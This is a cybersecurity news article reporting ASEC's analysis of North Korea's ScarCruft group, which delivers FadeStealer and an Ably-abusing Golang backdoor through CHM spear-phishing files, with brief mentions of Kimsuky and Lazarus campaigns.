Posted on June 21, 2023 at 7:15 AM

ScarCruft Hackers Deploy Information Stealing Malware With Wiretapping Features

ScarCruft, a threat actor group based in North Korea, has been detected using information-stealing malware to conduct hacking campaigns. The malware that the threat actor group is deploying is one that contains wiretapping features, including a backdoor that has been created with Golang. The hacker group is using this malware to conduct hacking exploits on the Ably real-time messaging platform.

ScarCruft uses information-stealing malware to exploit Ably service

The hacking campaign was revealed in a technical report published by the AhnLab Security Emergency Response Center (ASEC). The report said that the threat actor was using the Golang backdoor to send commands to the Ably service. The API key value needed to perform command communication is located on a GitHub repository.

“This API key value is necessary for communicating with the threat actor’s channel, so anyone is capable of subscribing if they know this key value. Due to this, some of the commands used by the threat actor at the time of analysts could be identified,” the ASEC report said.

ScarCruft is a threat actor group based in North Korea. The state-sponsored threat actor group has previously been associated with the North Korean Ministry of State Security (MSS). This hacking group has remained active since around 2012.

This threat actor group has conducted attack chains in pursuit of the Ably messaging service. The attack chains that have been launched revolve around spear-phishing campaigns that will deliver RokRAT. This threat actor group has also leveraged a variety of other custom tools. These tools have been used to collect sensitive information from the targets.

The latest intrusion conducted by the ASEC researchers happened in May 2023. The email sent by the hackers contains a Microsoft Compiled HTML Help (.CHM) file. The file is a tactic that was initially reported in March of this year. Whenever a user clicks on the link for this file, it will contact a remote server and allow it to download PowerShell malware.

The PowerShell malware that is downloaded by the remote server is known as Chinotto. The Chinotto PowerShell malware is associated with launching persistence attacks, retrieving additional payloads, and also having a backdoor with the codename AblyGo or SidLevel by Kaspersky.

The additional payloads will also abuse the Ably API service for a command-and-control function. The AblyGo backdoor is also being used as a platform that will execute an information stealer malware that is known as FadeStealer.

The FadeStealer malware also contains a wide range of features. The malware can be used to conduct functions like capturing screenshots, collecting data from smartphones, removable media, recording microphone, and even log keystrokes.

The ASEC report has also said that ScarCruft, which is also known as the RedEyes hacking group, conducts hacking campaigns that are targeted toward some individuals. The target of this hacking campaign includes North Korean defectors, human rights activists, and university professors. The main goal of these hacking exploits is to steal information from the targets.

The threat actor also appears to be conducting hacking campaigns targeting South Korea. The hacker group is conducting unauthorized eavesdropping in South Korea, which is seen as a violation of privacy, and it is an area that is strictly regulated under the relevant laws. The threat actor has also monitored the activities of the victims on their PCs, and it even conducted wiretapping activities to steal the data.

CHM files are exploited by other North Korean hackers

CHM files have also been used by other hacking groups that are also based in North Korea, including Kimsuky. A report by SentinelOne has also disclosed a recent hacking campaign that leveraged the file format to launch a reconnaissance tool known as RandomQuery.

In the new set of hacking campaigns that have been detected by ASEC researchers, the CHM files have been configured in a manner that will drop a BAT file. This file is later used to download next-stage malware, after which user information will be exfiltrated from the compromised host.

Spear-phishing hacking campaigns have been ranked as a preferred initial access technique by the Kimsuky hacking group for more than ten years. This spear-phishing campaign is usually preceded by intense research and utmost preparation. The intelligence agencies located in the US and South Korea revealed this hacking activity.

The findings by the hacking group also come after active hacking exploitation by the Lazarus hacking group. This hacking group has been actively exploiting the security vulnerabilities that exist in software like MagicLine4NX, INISAFE CrossWeb EX, VestCert, and TCO!Stream.